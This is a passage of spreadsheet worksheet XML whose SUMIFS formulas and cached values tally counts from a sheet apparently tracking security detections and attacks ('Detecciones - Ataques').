        <f>AR29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AR27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>4</v>
      </c>
      <c r="AS33" s="355">
        <f>AS29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AS27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="AT33" s="355">
        <f>AT29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AT27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="AU33" s="355">
        <f>AU29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AU27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>2</v>
      </c>
      <c r="AV33" s="355">
        <f>AV29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AV27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>3</v>
      </c>
      <c r="AW33" s="355">
        <f>AW29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AW27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="AX33" s="355">
        <f>AX29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AX27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>9</v>
      </c>
      <c r="AY33" s="355">
        <f>AY29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AY27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="AZ33" s="355">
        <f>AZ29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AZ27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>2</v>
      </c>
      <c r="BA33" s="355">
        <f>BA29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BA27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="BB33" s="355">
        <f>BB29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BB27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="BC33" s="355">
        <f>BC29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BC27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>3</v>
      </c>
      <c r="BD33" s="355">
        <f>BD29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BD27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="BE33" s="355">
        <f>BE29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BE27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="BF33" s="355">
        <f>BF29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BF27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>2</v>
      </c>
      <c r="BG33" s="355">
        <f>BG29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BG27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="BH33" s="355">
        <f>BH29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BH27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="BI33" s="355">
        <f>BI29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BI27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="BJ33" s="355">
        <f>BJ29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BJ27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="BK33" s="355">
        <f>BK29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BK27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>3</v>
      </c>
      <c r="BL33" s="355">
        <f>BL29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BL27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="BM33" s="355">
        <f>BM29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BM27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>3292</v>
      </c>
      <c r="BN33" s="355">
        <f>BN29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BN27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>5180</v>
      </c>
      <c r="BO33" s="355">
        <f>BO29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BO27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="BP33" s="355">
        <f>BP29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BP27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="BQ33" s="355">
        <f>BQ29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BQ27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>10</v>
      </c>
      <c r="BR33" s="355">
        <f>BR29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BR27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="BS33" s="355">
        <f>BS29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BS27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>2</v>
      </c>
      <c r="BT33" s="355">
        <f>BT29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BT27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="BU33" s="355">
        <f>BU29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BU27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="BV33" s="355">
        <f>BV29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BV27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="BW33" s="355">
        <f>BW29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BW27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="BX33" s="355">
        <f>BX29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BX27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="BY33" s="355">
        <f>BY29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BY27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>2</v>
      </c>
      <c r="BZ33" s="355">
        <f>BZ29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BZ27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>123</v>
      </c>
      <c r="CA33" s="355">
        <f>CA29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CA27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="CB33" s="355">
        <f>CB29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CB27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="CC33" s="355">
        <f>CC29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CC27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="CD33" s="355">
        <f>CD29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CD27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="CE33" s="355">
        <f>CE29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CE27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="CF33" s="355">
        <f>CF29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CF27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="CG33" s="355">
        <f>CG29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CG27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="CH33" s="355">
        <f>CH29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CH27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="CI33" s="355">
        <f>CI29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CI27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="CJ33" s="355">
        <f>CJ29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CJ27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="CK33" s="355">
        <f>CK29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CK27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="CL33" s="355">
        <f>CL29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CL27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="CM33" s="355">
        <f>CM29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CM27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>5</v>
      </c>
      <c r="CN33" s="355">
        <f>CN29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CN27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="CO33" s="355">
        <f>CO29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CO27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>3</v>
      </c>
      <c r="CP33" s="355">
        <f>CP29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CP27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>2</v>
      </c>
      <c r="CQ33" s="355">
        <f>CQ29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CQ27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="CR33" s="355">
        <f>CR29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CR27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="CS33" s="355">
        <f>CS29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CS27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="CT33" s="355">
        <f>CT29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CT27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1002</v>
      </c>
      <c r="CU33" s="355">
        <f>CU29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CU27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="CV33" s="355">
        <f>CV29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CV27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="CW33" s="355">
        <f>CW29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CW27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="CX33" s="355">
        <f>CX29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CX27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="CY33" s="355">
        <f>CY29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CY27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>2</v>
      </c>
      <c r="CZ33" s="355">
        <f>CZ29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CZ27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="DA33" s="355">
        <f>DA29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DA27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="DB33" s="355">
        <f>DB29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DB27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="DC33" s="355">
        <f>DC29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DC27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="DD33" s="355">
        <f>DD29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DD27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>2</v>
      </c>
      <c r="DE33" s="355">
        <f>DE29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DE27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="DF33" s="355">
        <f>DF29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DF27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="DG33" s="355">
        <f>DG29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DG27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="DH33" s="355">
        <f>DH29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DH27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>450</v>
      </c>
      <c r="DI33" s="355">
        <f>DI29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DI27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="DJ33" s="356">
        <f>DJ29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DJ27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>11</v>
      </c>
      <c r="DK33" s="271"/>
      <c r="DO33" s="357"/>
      <c r="DP33" s="358" t="s">
        <v>244</v>
      </c>
      <c r="DQ33" s="359">
        <v>0.0</v>
      </c>
      <c r="DR33" s="359">
        <v>0.0</v>
      </c>
      <c r="DS33" s="359">
        <v>2.0</v>
      </c>
      <c r="DT33" s="359">
        <v>2.0</v>
      </c>
      <c r="DU33" s="360">
        <v>4.0</v>
      </c>
      <c r="DV33" s="271"/>
      <c r="DW33" s="358" t="s">
        <v>244</v>
      </c>
      <c r="DX33" s="359">
        <v>0.0</v>
      </c>
      <c r="DY33" s="359">
        <v>0.0</v>
      </c>
      <c r="DZ33" s="359">
        <v>3.0</v>
      </c>
      <c r="EA33" s="359">
        <v>3.0</v>
      </c>
      <c r="EB33" s="360">
        <v>7.0</v>
      </c>
      <c r="EC33" s="271"/>
      <c r="ED33" s="280"/>
      <c r="EG33" s="279"/>
      <c r="EH33" s="271"/>
      <c r="EI33" s="358" t="s">
        <v>244</v>
      </c>
      <c r="EJ33" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!AL$3:AL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI33,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!AL$3:AL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S31 &amp; "*")</f>
        <v>1</v>
      </c>
      <c r="EK33" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BX$3:$BX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI33,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!BX$3:BX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EI33 &amp; "*")</f>
        <v>3</v>
      </c>
      <c r="EL33" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!DN$3:DN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI33,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!DN$3:DN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EI33 &amp; "*")</f>
        <v>14</v>
      </c>
      <c r="EM33" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!FD$3:FD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI33,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!FD$3:FD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EI33 &amp; "*")</f>
        <v>31</v>
      </c>
      <c r="EN33" s="360">
        <f t="shared" si="4"/>
        <v>31</v>
      </c>
      <c r="EO33" s="364"/>
      <c r="EP33" s="364"/>
      <c r="EQ33" s="364"/>
      <c r="ER33" s="364"/>
      <c r="ES33" s="364"/>
      <c r="ET33" s="364"/>
      <c r="EU33" s="364"/>
      <c r="EV33" s="379" t="s">
        <v>244</v>
      </c>
      <c r="EW33" s="389">
        <f t="shared" si="8"/>
        <v>0.1428571429</v>
      </c>
      <c r="EX33" s="389">
        <f t="shared" si="9"/>
        <v>0.4285714286</v>
      </c>
      <c r="EY33" s="389">
        <f t="shared" si="10"/>
        <v>2</v>
      </c>
      <c r="EZ33" s="390">
        <f t="shared" si="11"/>
        <v>4.428571429</v>
      </c>
      <c r="FA33" s="367"/>
      <c r="FC33" s="299"/>
      <c r="FD33" s="46"/>
      <c r="FE33" s="300" t="s">
        <v>6</v>
      </c>
      <c r="FF33" s="301" t="s">
        <v>7</v>
      </c>
      <c r="FG33" s="301" t="s">
        <v>8</v>
      </c>
      <c r="FH33" s="302" t="s">
        <v>9</v>
      </c>
      <c r="FK33" s="303" t="s">
        <v>1373</v>
      </c>
      <c r="FL33" s="68">
        <f>SUMIFS('(B) - Detecciones - Ataques'!AP$3:AP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FK33,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!AP$3:AP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FK33 &amp; "*")</f>
        <v>9</v>
      </c>
      <c r="FM33" s="68">
        <f>SUMIFS('(B) - Detecciones - Ataques'!CB$3:CB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FK33,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!CB$3:CB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FK33 &amp; "*")</f>
        <v>20</v>
      </c>
      <c r="FN33" s="68">
